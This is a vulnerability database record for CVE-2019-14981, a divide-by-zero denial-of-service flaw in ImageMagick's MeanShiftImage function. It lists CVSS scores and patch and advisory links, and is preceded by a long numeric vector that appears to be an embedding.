0.006705486681312323, -0.0018162964843213558, 0.024219708517193794, -0.013410973362624645, -0.011433854699134827, 0.00899879913777113, 0.0025259151589125395, -0.00990013312548399, -0.007515960372984409, -0.0021751944441348314, -0.02387080527842045, 0.007014411501586437, 0.019189685583114624, 0.008511788211762905, -0.00011454070772742853, 0.02830478549003601, -0.01747424341738224, 0.010656090453267097, -0.013258327730000019, -0.005644239019602537, -0.0075086914002895355, 0.006745465099811554, -0.0025713450741022825, -0.023376526311039925, 0.0017844954272732139, -0.0006214841268956661, 0.014166930690407753, 0.002191549399867654, -0.021646546199917793, -0.016558373346924782, 0.006403830833733082, 0.0036325929686427116, -0.003434517653658986, 0.010983187705278397, 0.008112003095448017, -0.0049355290830135345, -0.00996555294841528, 0.0038379370234906673, -0.022329816594719887, -0.005182669032365084, 0.001852640532888472, 0.011622843332588673, 0.022780483588576317, 0.0024713987950235605, 0.03474495932459831, -0.011811832897365093, 0.00806112214922905, 0.017823146656155586, -0.009195057675242424, -0.003120141103863716, 0.019683964550495148, -0.013469124212861061, 0.010503445751965046, -0.021951837465167046, -0.003665302647277713, -0.014450415037572384, 0.010241767391562462, -0.018331965431571007, -0.007250648457556963, 0.024030718952417374, 0.016005942597985268, -0.005237184930592775, 0.017009040340781212, 0.01189905870705843, -0.011499273590743542, -0.010110928677022457, -0.005978604778647423, 0.004125055391341448, -0.012858542613685131, -0.003234625095501542, -0.035500917583703995, -0.006898110266774893, 0.004052367527037859, 0.0196548905223608, 0.0042595285922288895, 0.01895708404481411, 0.003587162820622325, 0.0012738608056679368, -0.000026888956199400127, -0.009841982275247574, 0.0012938500149175525, -0.029627710580825806, -0.01556981261819601, 0.018099362030625343, 0.002262420253828168, -0.0034272486809641123, 0.012720435857772827, -0.014690285548567772, -0.007072562351822853, 0.0002748522674664855, -0.015482586808502674, 0.013527274131774902, 0.0029674959369003773, 0.012029897421598434, 0.0016854576533660293, -0.000514269049745053, -0.005411636549979448, -0.0040341950953006744, 0.01985841616988182, 0.012487833388149738, -0.010358069092035294, 0.01363630685955286, 0.008300992660224438, -0.012684090994298458, 0.0066327983513474464, 0.0001983024994842708, -0.014573984779417515, -0.014174199663102627, -0.0015128232771530747, 0.0038161305710673332, -0.0042558941058814526, -0.009892864152789116, -0.019436825066804886, -0.013360091485083103, -0.029773088172078133, -0.002287861192598939, 0.01966942846775055, 0.014959231950342655, 0.008039315231144428, -0.014748436398804188, 0.021006891503930092, 0.0015718823997303843, 0.003961507230997086, 0.014944694936275482, 0.01325105968862772, -0.007225207518786192, 0.0024695817846804857, -0.006022217683494091, 0.003334571374580264, 0.022620568051934242, 0.006193034816533327, 0.022998547181487083, 0.009558498859405518, 0.010110928677022457, -0.00028666408616118133, -0.000023723045160295442, -0.0044848620891571045, -0.024481385946273804, 0.0050845397636294365, -0.005106346216052771, -0.012451489455997944, -0.004186840262264013, 0.01779407262802124, -0.009652993641793728, -0.0029893023893237114, 0.005662410985678434, 0.010765123181045055, 0.01044529490172863, 0.011179445311427116, 0.01473389845341444, 0.004920991137623787, 0.02360912784934044, 0.009594842791557312, 0.011630112305283546, -0.008548133075237274, 0.005040926858782768, -0.020934201776981354, -0.008526326157152653, -0.013861640356481075, -0.00832279957830906, -0.011615574359893799, 0.009754756465554237, 0.007290626876056194, 0.00806112214922905, 0.004488496575504541, -0.006774540524929762, 0.00806112214922905, 0.0018371943151578307, -0.008795272558927536, 0.005724195856601, 0.02567347325384617, -0.00944946613162756, 0.01556981261819601, 0.01063428446650505, 0.006287529598921537, -0.01972757838666439, 0.006770906038582325, -0.01208804827183485, 0.0010585219133645296, -0.02520826831459999, 0.00635294895619154, -0.008002971298992634, -0.02340560220181942, 0.004942797590047121, -0.010517982766032219, 0.012218886986374855, -0.00944946613162756, 0.027228999882936478, -0.008359143510460854, -0.012945769354701042, 0.01315656490623951, 0.006094906013458967, -0.0174160934984684, -0.03992035984992981, -0.0035108402371406555, 0.014617597684264183, -0.013527274131774902, -0.0024114311672747135, -0.0031437647994607687, -0.00010199063399340957, 0.01070697233080864, -0.0083809494972229, -0.02430693432688713, 0.007203401066362858, 0.015642501413822174, -0.00012743150000460446, -0.005720561370253563, 0.009369509294629097, -0.006527400575578213, -0.008780734613537788, 0.00001730603980831802, 0.013440048322081566, -0.01798306219279766, -0.002484119264408946, -0.0037434424739331007, -0.003390904748812318, -0.0041359588503837585, -0.007326970808207989, -0.0022478827740997076, -0.02528095617890358, -0.016093168407678604, -0.0033254853915423155, -0.00960938073694706, -0.00232057087123394, 0.018361039459705353, -0.006411099340766668, -0.02102142758667469, -0.009711143560707569, 0.006302067078649998, -0.0062584541738033295, -0.008780734613537788, 0.013032995164394379, -0.006610991898924112, 0.01447222102433443, -0.025818848982453346, -0.015075533650815487, 0.0044848620891571045, -0.010503445751965046, 0.01205897331237793, -0.0035544531419873238, 0.002502291463315487, 0.011593768373131752, 0.006690949201583862, 0.0017408824060112238, -0.0053389486856758595, -0.0007359680603258312, 0.03410530462861061, 0.012458758428692818, 0.017328867688775063, 0.014057897962629795, 0.009776563383638859, -0.014232350513339043, -0.00498277647420764, -0.006251185666769743, 0.005113615188747644, 0.007610454689711332, -0.002106140600517392, 0.007094368804246187, 0.021254030987620354, 0.015700651332736015, -0.009500348009169102, -0.009674799628555775, 0.008657164871692657, 0.00580415315926075, 0.028333861380815506, 0.0012893070233985782, 0.029496872797608376, -0.009434929117560387, -0.019509512931108475, -0.0039106253534555435, 0.005782346706837416, 0.005389830097556114, -0.009951015003025532, -0.014246887527406216, -0.005280797835439444, 0.013556350022554398, 0.00268401182256639, 0.013505468145012856, -0.00899153109639883, -0.026153216138482094, 0.009740219451487064, 0.00754503533244133, -0.004201378207653761, -0.010547058656811714, -0.014784780330955982, -0.007417831104248762, 0.008141078986227512, 0.001895344932563603, 0.008460907265543938, 0.010190886445343494, -0.0022260763216763735, 0.002431420376524329, 0.013018457219004631, 0.0029674959369003773, -0.002395076211541891, -0.0021860976703464985, -0.01792491041123867, 0.014123317785561085, -0.011193983256816864, 0.010728778317570686, 0.016224006190896034, 0.006211206782609224, 0.008315530605614185, -0.014021554030478, 0.007959358394145966, -0.013272865675389767, 0.020018331706523895, -0.008032046258449554, 0.020265471190214157, -0.007087099831551313, -0.014886544086039066, 0.012138930149376392, 0.004826496820896864, 0.005549744237214327, 0.008591745980083942, 0.016151318326592445, -0.011106757447123528, -0.028028570115566254, 0.010416219010949135, -0.0032746035140007734, 0.0010666993912309408, -0.00889703631401062, 0.03300044313073158, 0.002298764418810606, -0.003590797306969762, -0.009231401607394218, -0.001630941522307694, 0.0033036787062883377, 0.0023641837760806084, -0.005749636795371771, -0.0048846472054719925, 0.00802477728575468, -0.0011502908309921622, -0.00436856085434556, 0.004888281691819429, -0.021966375410556793, 0.009267745539546013, -0.019524050876498222, -0.0016409361269325018, 0.014668479561805725, 0.007792175281792879, -0.0017754093278199434, -0.007595917209982872, -0.008918842300772667, 0.004215915687382221, 0.011557424440979958, -0.01921876147389412, 0.0010267208563163877, 0.009413122199475765, -0.004692023620009422, 0.0011475649662315845, 0.009493079036474228, -0.013752607628703117, -0.007515960372984409, -0.009667530655860901, 0.007726755924522877, -0.012189812026917934, -0.023696353659033775, -0.0011339359916746616, -0.0016736459219828248, -0.0034890337847173214, 0.01408697385340929, -0.014748436398804188, -0.007036217954009771, -0.023565515875816345, -0.018550029024481773, 0.012066241353750229, -0.012749510817229748, -0.020716138184070587, -0.019625814631581306, 0.006389292888343334, -0.012785854749381542, -0.005397099070250988, 0.030092915520071983, 0.023434676229953766, -0.023420138284564018, -0.0031383130699396133, 0.01857910491526127, 0.020541686564683914, -0.005636970046907663, 0.012487833388149738, 0.022213514894247055, 0.005248088389635086, 0.00935497134923935, -0.005644239019602537, -0.004608431831002235, -0.010038240812718868, 0.01118671428412199, -0.024728527292609215, 0.011310284025967121, 0.010241767391562462, 0.004394001793116331, 0.003398173488676548, 0.005211743991822004, -0.008664433844387531, 0.024132482707500458, -0.0012020810972899199, -0.01916060969233513, -0.013890715315937996, -0.017837684601545334, 0.023318376392126083, -0.0076322611421346664, 0.003965141251683235, -0.021820997819304466, -0.003994216676801443, -0.0001415148435626179, -0.0025786140467971563, -0.018797168508172035, 0.004041464067995548, 0.01092503685504198, -0.02786865644156933, 0.005026389379054308, -0.009711143560707569, 0.011106757447123528, 0.016005942597985268, 0.020163707435131073, -0.003409076714888215, -0.0025677108205854893, -0.01498830784112215, -0.002573162317276001, -0.009856520220637321, -0.026647495105862617, 0.039629608392715454, -0.019771190360188484, -0.004041464067995548, -0.009841982275247574, 0.04099614545702934, -0.027737818658351898, 0.012291574850678444, -0.00249138823710382, 0.005051830317825079, 0.013745339587330818, 0.009478542022407055, 0.019116997718811035, -0.014261425472795963, -0.0015228178817778826, -0.01196447852998972, -0.008170153945684433, -0.018099362030625343, 0.009914671070873737, 0.006044024135917425, 0.01061247754842043, -0.009078756906092167, 0.01182637084275484, -0.010779660195112228, 0.018273813650012016, 0.02347829006612301, 0.012218886986374855, -0.013323747552931309, 0.0011439305962994695, -0.02657480724155903, 0.015627963468432426, -0.005564281716942787, 0.009456735104322433, -0.006574647966772318, -0.017517857253551483, 0.00847544427961111, 0.010823273099958897, -0.001028538099490106, 0.00844636932015419, -0.000033873839129228145, -0.019320525228977203, -0.00007626582373632118, -0.013679919764399529, 0.004266797564923763, 0.013490930199623108, 0.004506668541580439, 0.0052335504442453384, 0.013810758478939533, -0.0019553126767277718, -0.005469787400215864, -0.0038815499283373356, 0.010772391222417355, -0.005418905522674322, 0.01689273864030838, -0.019073383882641792, -0.0017108985921368003, 0.005953163839876652, -0.017895836383104324, 0.0019135168986395001, -0.027170849964022636, -0.005825959611684084, -0.02154478244483471, -0.019829342141747475, -0.0225624181330204, -0.03718728572130203, -0.00553157227113843, -0.017125340178608894, 0.033116746693849564, 0.0012929413933306932, -0.0044848620891571045, -0.012749510817229748, 0.009871058166027069, 0.0316048301756382, -0.01786676049232483, 0.0043540233746171, -0.003650764934718609, -0.009660262614488602, 0.00008262604387709871, 0.034657735377550125, 0.006741830613464117, 0.000019790499209193513, 0.008431831374764442, -0.013178370893001556, 0.006865400820970535, -0.0016018662136048079, -0.0070834653452038765, -0.003790689865127206, -0.020032867789268494, -0.014886544086039066, -0.010314456187188625, 0.020018331706523895, -0.004564818926155567, -0.00000996623384708073, 0.006272992119193077, -0.005847766064107418, -0.002609506482258439, 0.008671702817082405, 0.007981164380908012, -0.029322421178221703, -0.010525251738727093, -0.008838885463774204, -0.017357943579554558, -0.02753429114818573, -0.002540452638641, -0.00899153109639883, 0.000753231521230191, 0.0021970008965581656, -0.005219012964516878, 0.0013438231544569135, 0.012080779299139977, 0.004244991112500429, -0.011760951019823551, -0.010299918241798878, -0.02449592389166355, 0.017299791797995567, -0.00861355196684599, -0.02171923592686653, -0.006923551205545664, -0.03378547728061676, 0.006680045742541552, -0.02785411849617958, -0.007559573277831078, -0.001973484642803669, -0.0000372243084711954, -0.018201125785708427, 0.027563367038965225, 0.002445958089083433, -0.002980216406285763, 0.00591318542137742, -0.010408950969576836, -0.003679840359836817, 0.0012575059663504362, 0.0008686240180395544, 0.0000053806306823389605, 0.02347829006612301, -0.005807787179946899, 0.02218443900346756, 0.016267620027065277, -0.0031601195223629475, 0.024655837565660477, -0.017067190259695053, 0.01985841616988182, -0.009660262614488602, -0.008693508803844452, 0.0038670124486088753, -0.017503319308161736, -0.009340434335172176, 0.004670217167586088, -0.008751659654080868, -0.024990204721689224, -0.015046457760035992, 0.01987295411527157, 0.021065041422843933, -0.0009967369260266423, -0.009173250757157803, -0.0020007428247481585, -0.02430693432688713, 0.00509180873632431, 0.0003593522997107357, -0.0014319575857371092, 0.0033254853915423155, -0.02605145238339901, 0.0009967369260266423, -0.01135389693081379, -0.015468049794435501, 0.006730927620083094, 0.007388755679130554, -0.004524840507656336, 0.0033472918439656496, -0.012553252279758453, 0.005753271281719208, 0.030529044568538666, 0.020992353558540344, 0.017837684601545334, 0.010081853717565536, -0.030063841491937637, -0.029802164062857628, 0.014457683078944683, -0.00861355196684599, -0.01470482349395752, 0.0014837479684501886, -0.020672524347901344, 0.006665508262813091, -0.0038633779622614384, -0.00754503533244133, -0.009602111764252186, -0.021006891503930092, -0.007690411992371082, -0.00992920808494091, 0.002640398917719722, -0.010561595670878887, 0.0130620701238513, 0.014057897962629795, -0.020396308973431587, 0.013054801151156425, 0.018840782344341278, -0.011019531637430191, 0.02275140769779682, 0.02083243802189827, -0.002898442093282938, -0.004960970021784306, -0.030325518921017647, -0.019843880087137222, 0.0322444885969162, 0.013331016525626183, 0.00944946613162756, 0.005349851679056883, -0.030209217220544815, -0.020018331706523895, 0.009049681015312672, -0.015497124753892422, -0.02629859186708927, 0.02353643998503685, 0.011332090944051743, 0.04939890280365944, -0.015395360998809338, 0.0028584636747837067, 0.012982113286852837, 0.018477341160178185, -0.0043540233746171, -0.019509512931108475, -0.012051704339683056, -0.023289300501346588, -0.003779786638915539, 0.0014001565286889672, 0.00718886312097311, -0.01604955457150936, 0.01524998527020216, 0.0016218555392697453, 0.0006787261227145791, -0.003979679197072983, -0.0023369258269667625, 0.0026385816745460033, 0.011070413514971733, 0.00045907142339274287, -0.003031098050996661, -0.02552809752523899, -0.04300234094262123, -0.02404525689780712, -0.010234499350190163, -0.021137729287147522, 0.0005896830698475242, -0.016412995755672455, 0.0141814686357975, 0.011971746571362019, 0.01373080164194107, -0.011615574359893799, 0.0015518930740654469, 0.0009385864250361919, -0.010038240812718868, -0.009587573818862438, -0.015700651332736015, -0.0010548875434324145, 0.0002930243208538741, -0.02522280625998974, 0.020352696999907494, -0.00664006732404232, 0.008308261632919312, -0.009107831865549088, -0.0035544531419873238, 0.01163738127797842, 0.014065166935324669, -0.008817078545689583, 0.015584350563585758, -0.024786677211523056, -0.009136906825006008, -0.007341508287936449, -0.01270589791238308, -0.017198028042912483, -0.015598888508975506, 0.03785601630806923, 0.000006502186806756072, 0.008468175306916237, -0.045037612318992615, -0.008744390681385994, 0.009493079036474228, -0.0225624181330204, -0.009987358935177326, -0.00282030226662755, -0.002976581919938326, -0.01382529642432928, -0.02030908316373825, -0.01565703935921192, -0.0017408824060112238, 0.002551355864852667, 0.01237880066037178, 0.021893687546253204, 0.020410846918821335, -0.012356994673609734, 0.0034163454547524452, 0.013461855240166187, -0.0029856679029762745, 0.025688011199235916, 0.01966942846775055, 0.020076481625437737, -0.01664559915661812, -0.02365274168550968, -0.00889703631401062, 0.009195057675242424, 0.00037843294558115304, -0.0031383130699396133, 0.004037829581648111, -0.02629859186708927, -0.01664559915661812, 0.0017963071586564183, -0.017764996737241745, -0.009136906825006008, 0.010147273540496826, -0.015104608610272408, -0.024219708517193794, 0.008410025388002396, 0.006251185666769743, 0.026065990328788757, 0.004699292127043009, -0.024074332788586617, -0.010576133616268635, 0.022940397262573242, -0.0035926143173128366, -0.020657986402511597, -0.006218475755304098, 0.025615323334932327, -0.01498830784112215, 0.011615574359893799, -0.009667530655860901, -0.0026367646642029285, -0.016718287020921707, 0.022722331807017326, -0.019756654277443886, -0.002940237754955888, -0.010001896880567074, 0.0046847546473145485, 0.013098414056003094, 0.007207035087049007, 0.006211206782609224, 0.0028221195098012686, -0.01261140312999487, -0.008082928135991096, 0.0073342397809028625, -0.011651919223368168, 0.014450415037572384, 0.020977815613150597, -0.011303015984594822, -0.01798306219279766, -0.003765248926356435, -0.02360912784934044, 0.020280009135603905, -0.009078756906092167, 0.000672820198815316, -0.013483661226928234, -0.007247013971209526, -0.005557013209909201, 0.007952089421451092, 0.003594431560486555, 0.017183491960167885, -0.01363630685955286, -0.01064155250787735, 0.007167056668549776, -0.00796662736684084, 0.002823936752974987, -0.009783832356333733, -0.0225624181330204, 0.0004579356755129993, -0.02539725787937641, 0.0031165066175162792, -0.00980563834309578, 0.005317142233252525, 0.005186303053051233, -0.020643450319767, -0.02043992280960083, 0.019683964550495148, 0.035878896713256836, -0.00782851967960596, 0.005611529108136892, -0.00925320852547884, 0.028072183951735497, -0.004372195340692997, -0.0001331102685071528, 0.0036380444653332233, 0.006287529598921537, 0.01593325473368168, -0.0029529582243412733, 0.021951837465167046, -0.015264522284269333, -0.0030220120679587126, 0.002051624469459057, 0.011012262664735317, -0.009958283975720406, 0.034134380519390106, 0.0014910167083144188, -0.02154478244483471, -0.007236110512167215, 0.013287403620779514, 0.0003012017405126244, 0.004248625598847866, 0.02360912784934044, 0.013469124212861061, -0.003280055243521929, 0.013490930199623108, -0.020294547080993652, 0.009914671070873737, -0.010241767391562462, 0.005851400550454855, 0.008984262123703957, 0.012218886986374855, 0.009951015003025532, 0.006236647721379995, 0.001506463042460382, -0.00996555294841528, -0.016078630462288857, -0.004619335290044546, -0.004361292347311974, 0.0005079088150523603, 0.00970387551933527, -0.014014285057783127, -0.0025277321692556143, 0.00349085102789104, 0.019058845937252045, 0.005295335780829191, -0.02526642009615898, -0.00690174475312233, 0.014762974344193935, 0.0035253779496997595, -0.012596865184605122, -0.020934201776981354, 0.014683016575872898, 0.020992353558540344, -0.0011802746448665857, -0.010481638833880424, 0.0024223343934863806, 0.012226155959069729, 0.00762499263510108, 0.0033999907318502665, -0.011048606596887112, 0.004975507501512766, -0.014275963418185711, -0.015715189278125763, -0.002640398917719722, -0.01382529642432928, 0.0017826781840994954, -0.0143486512824893, -0.01875355653464794, 0.0028366572223603725, -0.015424436889588833, -0.00063511315966025, 0.01856456696987152, 0.01689273864030838, -0.0055352067574858665, 0.014973769895732403, 0.007843056693673134, -0.008133810013532639, -0.0018135706195607781, 0.011303015984594822, 0.007225207518786192, -0.004837399814277887, -0.010808736085891724, -0.013134757988154888, 0.00381976505741477, -0.009769294410943985, -0.032855067402124405, -0.005215378478169441, -0.0048592062667012215, 0.011746414005756378, 0.0036580339074134827, 0.017517857253551483, -0.00368347461335361, 0.001902613672427833, 0.007813981734216213, -0.02081790193915367, -0.0038706467021256685, 0.00039615071727894247, 0.004452152643352747, -0.00018569563690107316, -0.019393213093280792, -0.003750711213797331, 0.01092503685504198, -0.022620568051934242, 0.0057096583768725395, 0.016427533701062202, -0.011259403079748154, -0.020992353558540344, -0.00037956872256472707, 0.01850641705095768, -0.011593768373131752, -0.0017336136661469936, 0.014065166935324669, 0.025906074792146683, 0.0010739682475104928, 0.0019862051121890545, 0.03829214349389076, -0.014973769895732403, -0.00909329392015934, -0.022475192323327065, 0.012480564415454865, -0.005229916423559189, 0.0010158176301047206, 0.013309209607541561, 0.007988433353602886, 0.0018153878627344966, -0.024844827130436897, -0.016747361049056053, 0.025935150682926178, 0.01180456392467022, 0.02862461470067501, -0.007566841784864664, 0.0008022960391826928, 0.00336182932369411, 0.0038888189010322094, 0.006211206782609224, 0.03049997054040432, -0.01677643693983555, -0.007959358394145966, -0.000835005717817694, -0.0316048301756382, -0.004477593116462231, -0.00024327832215931267, 0.005360755138099194, 0.020657986402511597, 0.026996398344635963, -0.0027294419705867767, -0.00899153109639883, 0.013011188246309757, 0.0034853992983698845, -0.008126541040837765, -0.010525251738727093, 0.018666330724954605, 0.015947790816426277, 0.006985336076468229, 0.006948992144316435, -0.016282157972455025, -0.01247329544275999, 0.0077340248972177505, -0.0031782917212694883, -0.009325896389782429, 0.030907023698091507, 0.03361102566123009, -0.030005689710378647, 0.0037107327952980995, -0.01121578924357891, -0.003779786638915539, 0.018462803214788437, 0.012487833388149738, 0.016936350613832474, -0.004782883916050196, -0.0002630404196679592, -0.008867960423231125, 0.0128948874771595, 0.016035016626119614, 0.008097466081380844, 0.012604134157299995, 0.007261551450937986, 0.011550155468285084, -0.0013120220974087715, -0.005698754917830229, -0.014668479561805725, -0.012582328170537949, -0.0010003714123740792, -0.006287529598921537, -0.002420517150312662, 0.013323747552931309, -0.01650022156536579, 0.010510713793337345, -0.008715315721929073, -0.012080779299139977, 0.002751248423010111, -0.008112003095448017, -0.003445420879870653, -0.012429682537913322, 0.016718287020921707, 0.01554073765873909, -0.005782346706837416, -0.0048592062667012215, 0.006065830588340759, -0.01018361747264862, 0.015104608610272408, -0.025949688628315926, 0.0034327004104852676, -0.00825737975537777, 0.010140004567801952, -0.006051293108612299, 0.0011621026787906885, -0.0010730596259236336, -0.018404653295874596, -0.012226155959069729, 0.0009163256618194282, 0.00863535888493061, 0.00889703631401062, -0.017634157091379166, 0.008649895898997784, -0.007595917209982872, 0.014784780330955982, -0.02365274168550968, 0.014399533160030842, -0.00973295047879219, -0.02830478549003601, 0.006323873531073332, -0.031488530337810516, 0.00017195302643813193, 0.007381487172096968, -0.0027712376322597265, -0.002831205492839217, -0.019058845937252045, -0.004128689877688885, -0.007421465590596199, -0.008519057184457779, 0.006411099340766668, -0.0186954066157341, 0.00698170205578208, 0.0016500222263857722, 0.014036091975867748, -0.004815593361854553, 0.014741167426109314, 0.02908981963992119, 0.004437614697962999, 0.01760508306324482, -0.01470482349395752, -0.0024750332813709974, -0.02539725787937641, -0.0064837876707315445, 0.01993110589683056, -0.005706023890525103, -0.002720355987548828, 0.024859365075826645, -0.0032709690276533365, 0.005346217192709446, 0.01318563986569643, -0.01799759827554226, 0.010343531146645546, -0.012604134157299995, -0.007777637802064419, 0.01961127668619156, 0.006956261117011309, -0.0019007965456694365, 0.013934328220784664, 0.010525251738727093, 0.008976993151009083, -0.005186303053051233, -0.011906327679753304, -0.011717338114976883, 0.01299665030092001, 0.013265596702694893, -0.010161810554564, -0.017445169389247894, 0.01702357642352581, -0.009471273049712181, -0.008809810504317284, -0.00816288497298956, -0.0021261300425976515, -0.010096391662955284, -0.014915619045495987, -0.0039360662922263145, -0.004143227357417345, -0.007305164355784655, -0.009943746030330658, 0.021443020552396774, 0.014268694445490837, -0.013236521743237972, 0.0006537395529448986, 0.02083243802189827, 0.013629037886857986, -0.008853423409163952, 0.014857468195259571, 0.0003514020354487002, 0.01812843792140484, 0.025746161118149757, -0.005618798080831766, 0.002831205492839217, 0.0035435499157756567, -0.001552801695652306, 0.01753239519894123, -0.00037048268131911755, -0.00818469189107418, 0.00033936306135728955, 0.0021788289304822683, 0.001795398653484881, 0.005062733311206102, -0.005182669032365084, 0.009631186723709106, -0.015220909379422665, -0.007937551476061344, 0.010198154486715794, 0.02173377200961113, 0.0007714035455137491, -0.0023332913406193256, 0.0021224955562502146, -0.0018362856935709715, 0.0029747646767646074, 0.0341925323009491, 0.0018644523806869984, -0.02526642009615898, -0.016732824966311455, -0.004771980457007885, -0.019393213093280792, 0.02424878440797329, 0.033116746693849564, 0.052131980657577515, 0.039949435740709305, 0.014523102901875973, -0.0035889800637960434, -0.015046457760035992, -0.014661210589110851, -0.0072288415394723415, -0.001917151384986937, 0.003608969273045659, 0.004561184905469418, -0.007813981734216213, 0.005647873505949974, 0.0010757853742688894, -0.008817078545689583, -0.012298843823373318, 0.004205012694001198, -0.008911573328077793, -0.004430346190929413, -0.015308135189116001, -0.008715315721929073, -0.026211366057395935, 0.030151067301630974, -0.013171101920306683, -0.006985336076468229, -0.0053389486856758595, 0.010314456187188625, 0.0035326466895639896, -0.012008091434836388, -0.000008986647117126267, -0.014675748534500599, 0.024612225592136383, 0.003917894326150417, 0.014028823003172874, 0.001281129545532167, 0.01380348950624466, 0.009565767832100391, -0.006167593877762556, 0.009027875028550625, 0.008875229395925999, -0.006094906013458967, -0.020221857354044914, -0.01428323145955801, -0.022402504459023476, -0.01170280110090971, 0.00018285626720171422, -0.016616523265838623, -0.009725681506097317, -0.0040850769728422165, 0.006763637065887451, 0.003083796938881278, 0.002280592452734709, 0.02257695607841015, 0.002020732033997774, 0.006349314469844103, -0.008664433844387531, 0.000004670785074267769, -0.01080146711319685, 0.007014411501586437, 0.006498325150460005, 0.034018080681562424, -0.00763953011482954, -0.0021115923300385475, -0.00934770330786705, -0.004212281201034784, -0.010961380787193775, 0.0021152268163859844, -0.003750711213797331, 0.014043360948562622, 0.008569939061999321, 0.03236078843474388, 0.01137570384889841, -0.001242059632204473, -0.00790120754390955, 0.014944694936275482, -0.02701093629002571, -0.01972757838666439, 0.031895581632852554, -0.012356994673609734, -0.019102459773421288, 0.013272865675389767, 0.012684090994298458, -0.014835662208497524, -0.013658112846314907, -0.004521206021308899, -0.014552177861332893, 0.017823146656155586, -0.022082675248384476, -0.013658112846314907, -0.047363631427288055, -0.007726755924522877, -0.0014319575857371092, 0.01261140312999487, -0.02121041715145111, -0.011441122740507126, -0.007806712761521339, 0.012771316803991795, -0.002783958101645112, 0.009027875028550625, 0.009580304846167564, -0.011237596161663532, 0.0022696892265230417, -0.010627015493810177, -0.02257695607841015, -0.0020643449388444424, -0.0004824679344892502, -0.020396308973431587, 0.007417831104248762, 0.0018353770719841123, 0.0012157101882621646, -0.00332003366202116, -0.005211743991822004, 0.00012379710096865892, -0.009500348009169102, -0.0057387338019907475, 0.004946432076394558, 0.015758803114295006, -0.00880254153162241, 0.014777511358261108, 0.02308577299118042, 0.00037911441177129745, -0.007123443763703108, -0.02102142758667469, 0.015831490978598595, 0.0008927019662223756, 0.00026372188585810363, 0.0004901910433545709, -0.02122495509684086, 0.02469945140182972, 0.007704949472099543, 0.0008122906438075006, 0.0021642912179231644, -0.013839833438396454, 0.009587573818862438, 0.012204349040985107, 0.009791101329028606, -0.005549744237214327, 0.020876051858067513, 0.0012747693108394742, 0.0018235653406009078, 0.00002627848880365491, -0.028740914538502693, 0.04436887800693512, -0.003856109222397208, -0.025324570015072823, -0.01586056500673294, 0.00906421896070242, 0.0011003176914528012, 0.003461775602772832, -0.03532646596431732, 0.0112812090665102, 0.011622843332588673, 0.0046556792221963406, 0.008010240271687508, 0.00698170205578208, -0.008788003586232662, 0.015395360998809338, -0.014145124703645706, 0.008010240271687508, 0.0004611157928593457, -0.011644650250673294, 0.013498199172317982, -0.009689337573945522, 0.005357120651751757, 0.010372606106102467, 0.009136906825006008, -0.002146119251847267, 0.008141078986227512, 0.01767777092754841, 0.017576007172465324, 0.012138930149376392, -0.0007818524609319866, -0.013687188737094402, -0.012887618504464626, 0.0019789363723248243, 0.00799570232629776, 0.015409898944199085, -0.007501422427594662, 0.0015246350085362792, -0.002031635260209441, 0.00691264821216464, 0.011099488474428654, 0.0036780231166630983, -0.011688263155519962, 0.011971746571362019, -0.01044529490172863, -0.00782851967960596, -0.017576007172465324, 0.007214304059743881, 0.01638392172753811, 0.013941597193479538, -0.006102174520492554, -0.014057897962629795, 0.015744265168905258, -0.0067345621064305305, -0.00873712170869112, 0.001060339156538248, -0.0007754922844469547, -0.0010975918266922235, 0.0451539121568203, -0.0064547122456133366, -0.0015855113742873073, -0.00935497134923935, 0.005244453903287649, 0.01959673874080181 ]
3,058
CVE-2019-14981
2019-08-12T23:15:11.600000
In ImageMagick 7.x before 7.0.8-41 and 6.x before 6.9.10-41, there is a divide-by-zero vulnerability in the MeanShiftImage function. It allows an attacker to cause a denial of service by sending a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/a77d8d97f5a7bced0468f0b08798c83fb67427bc" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1552" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/b522d2d857d2f75b659936b59b0da9df1682c256" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00028.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
